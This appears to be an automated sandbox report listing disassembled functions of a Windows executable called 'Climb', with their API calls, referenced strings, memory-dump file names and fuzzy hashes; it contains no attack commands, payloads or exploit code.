LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00518E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00516691), ref: 00518EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00518EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00518F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00518F5C
FreeLibrary.KERNEL32(?), ref: 00518F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00518F78
DestroyIcon.USER32(?,?,?,?,?,00516691), ref: 00518F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00518FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00518FB0

Strings

.icl, xrefs: 00518DC3
.exe, xrefs: 00518DE3
.dll, xrefs: 00518E06

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 46774be894e069fd088f58902f42a9fad161fbcfb755703969cb357fab52b5f9
Instruction ID: 0fc3ce27994c640506350b781386a997ac3492fb2054b92bea938f10036f101a
Opcode Fuzzy Hash: 46774be894e069fd088f58902f42a9fad161fbcfb755703969cb357fab52b5f9
Instruction Fuzzy Hash: B861F071900214BAFB24DF64CC41BFE7BACBF18B14F10860AF815E61D1DBB49994DBA0

Function 004F48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 004F493D
_wcslen.LIBCMT ref: 004F4948
_wcslen.LIBCMT ref: 004F499F
_wcslen.LIBCMT ref: 004F49DD
GetDriveTypeW.KERNEL32(?), ref: 004F4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F4ACC

Strings

type cdaudio alias cd wait, xrefs: 004F4A46
wait, xrefs: 004F4A89
open , xrefs: 004F4A2A
open, xrefs: 004F4999, 004F499E
set cd door , xrefs: 004F4A6D
closed, xrefs: 004F494D, 004F4972, 004F498B, 004F49C3, 004F49DC
close cd wait, xrefs: 004F4AB7
close, xrefs: 004F4943, 004F495D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 9ded627039744c7b60c0ce1803d44f5347152839b66a1877b1112e407f312d9a
Instruction ID: 01dbfe24826be2438e5f431a129c43aaf1ce2b2fcc314d9a050bd10e3c6f63a0
Opcode Fuzzy Hash: 9ded627039744c7b60c0ce1803d44f5347152839b66a1877b1112e407f312d9a
Instruction Fuzzy Hash: C371BE726082099FC300EF25C88097FB7E4EFA8768F40492EF99597252EB38DD45CB95

Function 004E6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 004E6395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004E63A7
SetWindowTextW.USER32(?,?), ref: 004E63BE
GetDlgItem.USER32(?,000003EA), ref: 004E63D3
SetWindowTextW.USER32(00000000,?), ref: 004E63D9
GetDlgItem.USER32(?,000003E9), ref: 004E63E9
SetWindowTextW.USER32(00000000,?), ref: 004E63EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004E6410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004E642A
GetWindowRect.USER32(?,?), ref: 004E6433
_wcslen.LIBCMT ref: 004E649A
SetWindowTextW.USER32(?,?), ref: 004E64D6
GetDesktopWindow.USER32 ref: 004E64DC
GetWindowRect.USER32(00000000), ref: 004E64E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004E653A
GetClientRect.USER32(?,?), ref: 004E6547
PostMessageW.USER32(?,00000005,00000000,?), ref: 004E656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004E6596

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 1a1783d36f6f0f7ae3403607f00b852f56e2f258f2e583d9834e696e1942894d
Instruction ID: e76786623676a820f32ec254ec8593b686831aa014f1d5d5768f87d7ee9800eb
Opcode Fuzzy Hash: 1a1783d36f6f0f7ae3403607f00b852f56e2f258f2e583d9834e696e1942894d
Instruction Fuzzy Hash: 7471E130900705AFDB20DFA9CE45BAFBBF5FF14745F114919E586A22A0C778E904CB54

Function 0050086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00500884
LoadCursorW.USER32(00000000,00007F8A), ref: 0050088F
LoadCursorW.USER32(00000000,00007F00), ref: 0050089A
LoadCursorW.USER32(00000000,00007F03), ref: 005008A5
LoadCursorW.USER32(00000000,00007F8B), ref: 005008B0
LoadCursorW.USER32(00000000,00007F01), ref: 005008BB
LoadCursorW.USER32(00000000,00007F81), ref: 005008C6
LoadCursorW.USER32(00000000,00007F88), ref: 005008D1
LoadCursorW.USER32(00000000,00007F80), ref: 005008DC
LoadCursorW.USER32(00000000,00007F86), ref: 005008E7
LoadCursorW.USER32(00000000,00007F83), ref: 005008F2
LoadCursorW.USER32(00000000,00007F85), ref: 005008FD
LoadCursorW.USER32(00000000,00007F82), ref: 00500908
LoadCursorW.USER32(00000000,00007F84), ref: 00500913
LoadCursorW.USER32(00000000,00007F04), ref: 0050091E
LoadCursorW.USER32(00000000,00007F02), ref: 00500929
GetCursorInfo.USER32(?), ref: 00500939
GetLastError.KERNEL32 ref: 0050097B

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 0867bd0feaa064657b7eaf320164da4bd0767fa1061fb8965060d900fce11511
Instruction ID: d1839dfc10730c0593c42a2f6dfcc5d22291456c52416a75552a24e67bf5a804
Opcode Fuzzy Hash: 0867bd0feaa064657b7eaf320164da4bd0767fa1061fb8965060d900fce11511
Instruction Fuzzy Hash: D44131B0D083196ADB109FBA8C8996EBFA8FF04754B50452AA11CE72D1DA78E901CF91

Function 004A0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004A0436

Part of subcall function 004A045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0055170C,00000FA0,F5AC762E,?,?,?,?,004C2733,000000FF), ref: 004A048C
Part of subcall function 004A045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004C2733,000000FF), ref: 004A0497
Part of subcall function 004A045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004C2733,000000FF), ref: 004A04A8
Part of subcall function 004A045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004A04BE
Part of subcall function 004A045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004A04CC
Part of subcall function 004A045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004A04DA
Part of subcall function 004A045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004A0505
Part of subcall function 004A045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004A0510

___scrt_fastfail.LIBCMT ref: 004A0457

Part of subcall function 004A0413: __onexit.LIBCMT ref: 004A0419

Strings

WakeAllConditionVariable, xrefs: 004A04D2
api-ms-win-core-synch-l1-2-0.dll, xrefs: 004A0492
InitializeConditionVariable, xrefs: 004A04B8
kernel32.dll, xrefs: 004A04A3
SleepConditionVariableCS, xrefs: 004A04C4

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 08120336df75f59853d13a4358373458a9a80e92950d91aece186dbf6a0ef773
Instruction ID: cb480ec7c6661bfea707f4992747ca454a037bd73a55ac5c9c2a0b36348c22c4
Opcode Fuzzy Hash: 08120336df75f59853d13a4358373458a9a80e92950d91aece186dbf6a0ef773
Instruction Fuzzy Hash: D5213E32A427247FD7106BA9AC15B9A3BA4FF3BB55F00412BF901972C0DB7C9C04896C

Function 004E3A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004E3AD9
_wcslen.LIBCMT ref: 004E3B44

Strings

NAME, xrefs: 004E3C81, 004E3C92
INSTANCE, xrefs: 004E3D9F
CLASS, xrefs: 004E3AD4, 004E3AF1
REGEXPCLASS, xrefs: 004E3BA1, 004E3BB2
CLASSNN, xrefs: 004E3B3F, 004E3B50
TEXT, xrefs: 004E3DC8

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 1f1c319a8bc733af76a3bc62360fe3073843efa2e35129bfdac19eb9ff6b91f8
Instruction ID: f020c7b767ad74d1821345fe490a8ec0e7e5e5a0b97d70b4e48ac7de5d4d361d
Opcode Fuzzy Hash: 1f1c319a8bc733af76a3bc62360fe3073843efa2e35129bfdac19eb9ff6b91f8
Instruction Fuzzy Hash: 4DE13532E00556AFCB159F7AC8497FEBBB0BF54716F10412BE456E3240DB38AE858798

Function 004F4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0051DCD0), ref: 004F4F6C
_wcslen.LIBCMT ref: 004F4F80
_wcslen.LIBCMT ref: 004F4FDE
_wcslen.LIBCMT ref: 004F5039
_wcslen.LIBCMT ref: 004F5084
_wcslen.LIBCMT ref: 004F50EC

Part of subcall function 0049FD52: _wcslen.LIBCMT ref: 0049FD5D

GetDriveTypeW.KERNEL32(?,00547C10,00000061), ref: 004F5188

Strings

removable, xrefs: 004F502F, 004F5034
unknown, xrefs: 004F514D
ramdisk, xrefs: 004F5136
network, xrefs: 004F50E2, 004F50E7
fixed, xrefs: 004F507A, 004F507F
cdrom, xrefs: 004F4FD4, 004F4FD9
all, xrefs: 004F4F76, 004F4F7B

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: f173b93063f277ba51090367a91aefdedf211c7f401965902cafdcbc45ada173
Instruction ID: 89e3d2e1f5a6992db9e707ddb222e40ff9ce3af59bb4a1c1557fd401efb555a6
Opcode Fuzzy Hash: f173b93063f277ba51090367a91aefdedf211c7f401965902cafdcbc45ada173
Instruction Fuzzy Hash: 8AB1F3316087069FC310EF29C890A7FB7E5BFA5724F50491EF69683291DB38D845CBA6

Function 0050BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0050BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0050BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0050BC34
_wcslen.LIBCMT ref: 0050BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0050BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0050BC96
_wcslen.LIBCMT ref: 0050BD92

Part of subcall function 004F0F4E: GetStdHandle.KERNEL32(000000F6), ref: 004F0F6D

_wcslen.LIBCMT ref: 0050BDAB
_wcslen.LIBCMT ref: 0050BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0050BE16
GetLastError.KERNEL32(00000000), ref: 0050BE67
CloseHandle.KERNEL32(?), ref: 0050BE99
CloseHandle.KERNEL32(00000000), ref: 0050BEAA
CloseHandle.KERNEL32(00000000), ref: 0050BEBC
CloseHandle.KERNEL32(00000000), ref: 0050BECE
CloseHandle.KERNEL32(?), ref: 0050BF43

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 50641df5ecd7635e64c2b9159a3fdc289f1bd10069d2e2ca63fd2486f35d11f1
Instruction ID: 62d52edae2f5ebee9891cfd9bdc921603a3e225551a591c97c8624db59528d95
Opcode Fuzzy Hash: 50641df5ecd7635e64c2b9159a3fdc289f1bd10069d2e2ca63fd2486f35d11f1
Instruction Fuzzy Hash: E7F1BC716043019FE714EF25C891B6EBBE5BF85318F14895EF8898B2A2CB35EC44CB56

Function 00504A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0051DCD0), ref: 00504B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00504B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0051DCD0), ref: 00504B4F
FreeLibrary.KERNEL32(00000000,?,0051DCD0), ref: 00504B9B
StringFromGUID2.OLE32(?,?,00000028,?,0051DCD0), ref: 00504C05
SysFreeString.OLEAUT32(00000009), ref: 00504CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00504D25
SysFreeString.OLEAUT32(?), ref: 00504D4F

Strings

kernel32.dll, xrefs: 00504B13
GetModuleHandleExW, xrefs: 00504B24

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 8ba4b45f5c8e1bdb922f9d4be2e86a5aa2876804473b83eba38ef15ce987f337
Instruction ID: 20dd71d494a8f2afefcc98f2a96efb7e892d252c5b179bbfdae1128b230f11e6
Opcode Fuzzy Hash: 8ba4b45f5c8e1bdb922f9d4be2e86a5aa2876804473b83eba38ef15ce987f337
Instruction Fuzzy Hash: CE122BB1A00115EFDB14DF94C884EAEBBB9FF85318F148498EA059B291D771ED46CFA0

Function 0048381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(005529C0), ref: 004C3F72
GetMenuItemCount.USER32(005529C0), ref: 004C4022
GetCursorPos.USER32(?), ref: 004C4066
SetForegroundWindow.USER32(00000000), ref: 004C406F
TrackPopupMenuEx.USER32(005529C0,00000000,?,00000000,00000000,00000000), ref: 004C4082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004C408E

Strings

0, xrefs: 0048382D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 160cc184f4e87e768abb2647fbc495a19c2f352d1f0eacaf33e5566a2595f895
Instruction ID: 8f97485103fd0331c051f1d03b55839256907530b67f6230b9fe8d07d6bd282f
Opcode Fuzzy Hash: 160cc184f4e87e768abb2647fbc495a19c2f352d1f0eacaf33e5566a2595f895
Instruction Fuzzy Hash: 20712634640205BEEB209F2ADC49FAABFB5FF04769F10420FF514662D0C779A910DB59

Function 00517711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00517823

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00517897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005178B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005178CC
DestroyWindow.USER32(?), ref: 005178ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00480000,00000000), ref: 0051791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00517935
GetDesktopWindow.USER32 ref: 0051794E
GetWindowRect.USER32(00000000), ref: 00517955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0051796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00517985

Part of subcall function 00482234: GetWindowLongW.USER32(?,000000EB), ref: 00482242

Strings

tooltips_class32, xrefs: 00517890, 00517915
0, xrefs: 005177D0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 88d84f79a44e7a5ac4c8594895664fd185f60a23a74bca29261e4341a078f653
Instruction ID: d76fdc2a0fb1820f63f88e6eb9ceb09f460ec2971a8771e9327a4696acb2bcdc
Opcode Fuzzy Hash: 88d84f79a44e7a5ac4c8594895664fd185f60a23a74bca29261e4341a078f653
Instruction Fuzzy Hash: 3C716A70104248AFE725DF18CC48FAABBF9FB99704F04485EF985872A1C774A989DB25

Function 0048146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00481802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00481488,?,00000000,?,?,?,?,0048145A,00000000,?), ref: 00481865

DestroyWindow.USER32(?), ref: 00481521
KillTimer.USER32(00000000,?,?,?,?,0048145A,00000000,?), ref: 004815BB
DestroyAcceleratorTable.USER32(00000000), ref: 004C29B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0048145A,00000000,?), ref: 004C29E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0048145A,00000000,?), ref: 004C29F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0048145A,00000000), ref: 004C2A15
DeleteObject.GDI32(00000000), ref: 004C2A27

Strings

<)U, xrefs: 004815E0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: <)U
API String ID: 641708696-2373451638
Opcode ID: d5dce9272af195660f23d07cce8138a8eb4eda342a4eef5867d7223c206fecdd
Instruction ID: 02c9d7c35c1c4ff8a79d1f6a506b1d272c53a38fca1cc074a99946d49da9c965
Opcode Fuzzy Hash: d5dce9272af195660f23d07cce8138a8eb4eda342a4eef5867d7223c206fecdd
Instruction Fuzzy Hash: 8B619A35501701EFCB39AF14D958B2A77B5FB91322F10881FE44386770C7B9A886EB99

Function 004FCEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004FCEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004FCF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004FCF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004FCF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 004FCF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004FCF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004FCF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004FCFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004FD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004FD035
InternetCloseHandle.WININET(00000000), ref: 004FD040

Strings

, xrefs: 004FCFBA

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 385f679a8ff031836963a2a2226596dbac1f67be6ec1181ff84e766400f36b3e
Instruction ID: 2940305488d880f8550704c868e858a0f0af098b84b2507caa6e3bf8217c7fcd
